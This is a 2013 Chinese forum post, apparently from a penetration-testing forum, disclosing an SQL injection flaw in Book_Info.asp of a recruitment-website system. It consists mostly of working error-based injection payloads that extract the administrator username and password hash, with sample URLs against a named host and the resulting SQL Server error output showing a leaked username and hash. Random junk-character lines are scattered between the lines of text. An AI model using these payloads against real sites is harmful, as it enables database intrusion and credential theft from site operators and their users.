中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:56
标题:
网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
2 W x1 o, V# Y6 u# e8 E
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
3 D" I1 I' Y, h. c' E- ^2 E2 N
exp:如下
* r6 ]2 u5 Z4 w
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
' Z' a) s) {2 Y* C8 A
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& j2 G0 u8 J$ r
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! I( G# `/ p7 `6 M! N
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
+ D" I$ @% W; l" y& v/ J
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
* Z- e* _; F @" j% e' Z
/Educate/Book_Info.asp,行 8
2 s0 h1 V( D5 ]) u' `# {! W5 a
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 @# [) u( ^. i1 Q- L" z
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
3 `& \/ v2 n, |2 I" Y! o
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
@* o8 I. z( O* a% \ I
/Educate/Book_Info.asp,行 8
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2